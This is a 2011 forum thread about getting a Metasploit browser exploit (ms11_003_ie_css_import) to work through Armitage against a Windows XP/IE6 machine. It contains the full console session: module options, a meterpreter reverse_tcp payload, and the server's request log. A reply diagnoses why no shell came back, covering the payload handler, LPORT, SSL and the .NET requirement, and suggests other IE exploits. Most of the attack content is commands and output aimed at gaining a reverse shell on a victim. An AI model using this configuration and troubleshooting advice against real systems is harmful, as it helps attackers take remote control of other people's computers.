Jump to content

Armitage/metasploit Help


tony1grendel
 Share

Recommended Posts

Hey,guys. I really hope somebody could help me out here.

I am running linux, Ubuntu 10.04

I have mysql installed and database msf3 configured.

I have the metsaploit framework installed

I have armitage installed.

I run the msfrpc daemon: (with no SSL and type Basic)

sudo msfrpcd -f -U msf -P test -a 127.0.0.1 -t Basic -S

I get the following output:

[*] XMLRPC starting on 127.0.0.1:55553 (NO SSL):Basic...

[*] XMLRPC ready at 2011-09-02 13:20:16 -0500.

I assume everything is good here then I run gksudo armitage

Uncheck SSL and select mysql

I hit Connect, Armitage loads, I do an nmap on my IP range. See the target computer I have that i'm testing

My target PC is a Dell, Pentium 4 Processor, running Windows XP Pro SP3 with IE6

Then I select exploit:

ms11_003_ie_css_import

I edit the following settings to the following values:

SRVPORT:80

URIPATH: /

*LPORT: 443

I put an asterisk by the last setting because I ran the exploit with the default port (I believe 4444, and then with 443, and then again with 23)

Every time I changed the port number I terminated and restarted msfrpcd and armitage

With each time I get the same results: (after the target logs onto the IP address in IE6)

msf > use exploit/windows/browser/ms11_003_ie_css_import

msf > set SSLVersion SSL3

SSLVersion => SSL3

msf exploit(ms11_003_ie_css_import) > set LHOST 10.12.5.48

LHOST => 10.12.5.48

msf exploit(ms11_003_ie_css_import) > set DisablePayloadHandler true

DisablePayloadHandler => true

msf exploit(ms11_003_ie_css_import) > set LPORT 443

LPORT => 443

msf exploit(ms11_003_ie_css_import) > set SRVPORT 80

SRVPORT => 80

msf exploit(ms11_003_ie_css_import) > set SSL 0

SSL => 0

msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms11_003_ie_css_import) > set TARGET 0

TARGET => 0

msf exploit(ms11_003_ie_css_import) > set SRVHOST 0.0.0.0

SRVHOST => 0.0.0.0

msf exploit(ms11_003_ie_css_import) > set URIPATH /

URIPATH => /

msf exploit(ms11_003_ie_css_import) > set OBFUSCATE 1

OBFUSCATE => 1

msf exploit(ms11_003_ie_css_import) > exploit -j

[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://10.12.5.48:80/

[*] Server started.

[*] 10.12.5.114:2156 Received request for "/"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect

[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML

[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL

[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

Everything runs except for the metrepeter session, I don't compromise my target I don't get red lightning bolts surrounding the image of the target IP.

It seems like I'm doing everything that should be done. What am I doing wrong.

I changed the port numbers because I believe it may be that the network is blocking certain ports. But 443 and 23 should work

Link to comment
Share on other sites

What happens if you type the ip address of your attacker's machine into your victims's web browser.

Link to comment
Share on other sites

sorry, I should have been more specific the last lines appear when the the attacker's IP is entered into the victim's browser

everything after: [*] Server started.

[*] 10.12.5.114:2156 Received request for "/"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect

[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML

[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL

[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

all that is what happens.

Link to comment
Share on other sites

If you're launching this exploit through Armitage's module launcher, then beware that Armitage will try to configure the payload for you. By default, LPORT is set to some random value. You'll also notice that DisablePayloadHandler is set to true by default as well. Together, these values instruct Metasploit to not start a new payload handler when launching the attack and to instruct meterpreter to connect back to that random port number (which by the way, isn't so random--Armitage has a meterpreter listener running there already). If you don't change LPORT and everything else is ok with the targeted environment, it'll work.

If you want to change LPORT, go ahead. Just be sure to set DisablePayloadHandler to false.

Optionally, double click the Payload option name (it'll have a thick cross next to it). This will open up a dialog to let you choose what kind of payload you want and whether a listener exists or should be started. This will update all of the payload related options at once and you can tweak from there.

configurepayload.png

This is explained in the documentation too. http://www.fastandeasyhacking.com/manual

Now on to the exploit, be aware of a few things about this one:

(1) ms11_003_ie_css_import does not like to be served over SSL. In my experience you won't get code execution when this happens

(2) The ms11_003_ie_css_import requires that .NET 2.0 is installed on the target machine (necessary for the exploit)

(3) The exploit does not trigger twice. If you use it, you have to reboot before you try it again.

Since you're going after IE6, this exploit is not what I would use. I recommend trying ie_createobject or the ms10_002_aurora exploit

Good luck.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...